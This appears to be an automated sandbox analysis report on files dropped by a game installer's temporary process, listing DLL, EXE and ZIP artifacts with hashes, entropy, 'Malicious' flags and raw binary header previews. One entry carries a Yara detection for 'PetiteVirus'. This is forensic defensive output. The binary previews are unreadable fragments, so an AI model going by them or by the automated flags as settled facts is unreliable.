                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p....*.X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(*..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..|....J
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):15374
                                                                                  Entropy (8bit):5.192037544202194
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
                                                                                  MD5:BEFD36FE8383549246E1FD49DB270C07
                                                                                  SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
                                                                                  SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
                                                                                  SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):112640
                                                                                  Entropy (8bit):6.540227486061059
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                  MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                  SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                  SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                  SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                  Malicious:false
                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):127669
                                                                                  Entropy (8bit):7.952352167575405
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
                                                                                  MD5:75C1D7A3BDF1A309C540B998901A35A7
                                                                                  SHA1:B06FEEAC73D496C435C66B9B7FF7514CBE768D84
                                                                                  SHA-256:6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
                                                                                  SHA-512:8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-ULG4P.tmp, Author: Joe Security
                                                                                  Preview:MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):112640
                                                                                  Entropy (8bit):6.540227486061059
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                  MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                  SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                  SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                  SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                  Malicious:false
                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):43520
                                                                                  Entropy (8bit):6.232860260916194
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
                                                                                  MD5:B162992412E08888456AE13BA8BD3D90
                                                                                  SHA1:095FA02EB14FD4BD6EA06F112FDAFE97522F9888
                                                                                  SHA-256:2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
                                                                                  SHA-512:078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):967168
                                                                                  Entropy (8bit):6.500850562754145
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                                  MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                                  SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                                  SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                                  SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                  Category:dropped
                                                                                  Size (bytes):506871
                                                                                  Entropy (8bit):7.998074018431883
                                                                                  Encrypted:true
                                                                                  SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                                  MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                                  SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                                  SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                                  SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                                  Malicious:false
                                                                                  Preview:PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...*."......US.R.SB....i.....T.R.....**..3./;/..Q.].{....:s=t.c....|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx|...}MA.n*.].q:!]iB`....|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o*..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O..*..P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                  Category:dropped
                                                                                  Size (bytes):506871
                                                                                  Entropy (8bit):7.998074018431883
                                                                                  Encrypted:true
                                                                                  SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                                  MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                                  SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                                  SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                                  SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                                  Malicious:false
                                                                                  Preview:PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...*."......US.R.SB....i.....T.R.....**..3./;/..Q.].{....:s=t.c....|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx|...}MA.n*.].q:!]iB`....|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o*..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O..*..P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):512014
                                                                                  Entropy (8bit):6.566561154468342
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                                  MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                                  SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                                  SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                                  SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):126478
                                                                                  Entropy (8bit):6.268811819718352
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
                                                                                  MD5:6E93C9C8AADA15890073E74ED8D400C9
                                                                                  SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
                                                                                  SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
                                                                                  SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):845312
                                                                                  Entropy (8bit):6.581151900686739
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
                                                                                  MD5:00C672988C2B0A2CB818F4D382C1BE5D
                                                                                  SHA1:57121C4852B36746146B10B5B97B5A76628F385F
                                                                                  SHA-256:4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
                                                                                  SHA-512:C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...va.va.va.b..fa.b...a.b..`a.$..ya.$..`a.$..1a.b..ua.va.*a. ...a. ..wa. ...wa.vat.wa. ..wa.Richva.................PE..L......c...........!.................F.......0............................... ......u.....@.......................... ...q..t...(....P.......................`..p.......T...........................8...@............0..D............................text............................... ..`.rdata...i...0...j..................@..@.data...............................@....rsrc........P.......(..............@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):648384
                                                                                  Entropy (8bit):6.666474522542094
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
                                                                                  MD5:CE7DE939D74321A7D0E9BDF534B89AB9
                                                                                  SHA1:56082B4E09A543562297E098A36AADC3338DEEC5
                                                                                  SHA-256:A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
                                                                                  SHA-512:03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):227328
                                                                                  Entropy (8bit):6.641153481093122
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                                  MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                                  SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                                  SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                                  SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):867854
                                                                                  Entropy (8bit):4.9264497464202694
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
                                                                                  MD5:B476CA59D61F11B7C0707A5CF3FE6E89
                                                                                  SHA1:1A1E7C291F963C12C9B46E8ED692104C51389E69
                                                                                  SHA-256:AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
                                                                                  SHA-512:D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>.........#.........:....................Xd................................l6........ ......................@..b....P..p................................*..........................L.......................0Q...............................text...D...........................`.P`.data...x...........................@.P..rdata...%.......&..................@.`@/4.......K.......L..................@.0@.bss.........0........................`..edata..b....@......................@.0@.idata..p....P......................@.0..CRT....,....`......................@.0..tls.........p......................@.0..reloc...*.......,..................@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):394752
                                                                                  Entropy (8bit):6.662070316214798
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
                                                                                  MD5:A4123DE65270C91849FFEB8515A864C4
                                                                                  SHA1:93971C6BB25F3F4D54D4DF6C0C002199A2F84525
                                                                                  SHA-256:43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
                                                                                  SHA-512:D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):68042
                                                                                  Entropy (8bit):6.090396152400884
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
                                                                                  MD5:5DDA5D34AC6AA5691031FD4241538C82
                                                                                  SHA1:22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
                                                                                  SHA-256:DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
                                                                                  SHA-512:08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):123406
                                                                                  Entropy (8bit):6.263889638223575
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                                  MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                                  SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
                                                                                  SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                                  SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):562190
                                                                                  Entropy (8bit):6.388293171196564
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
                                                                                  MD5:713D04E7396D3A4EFF6BF8BA8B9CB2CD
                                                                                  SHA1:D824F373C219B33988CFA3D4A53E7C2BFA096870
                                                                                  SHA-256:00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
                                                                                  SHA-512:30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rd...............(..........................@.......................................@... .................................H...........................................................D...........................l............................text...T...........................`..`.data...X...........................@....rdata..H...........................@..@/4......P...........................@..@.bss....t................................idata..H............d..............@....CRT....0............n..............@....tls.................p..............@....rsrc................r..............@....reloc...............x..............@..B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):22542
                                                                                  Entropy (8bit):5.5875455203930615
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                                  MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                                  SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                                  SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
                                                                                  SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                                  Malicious:false
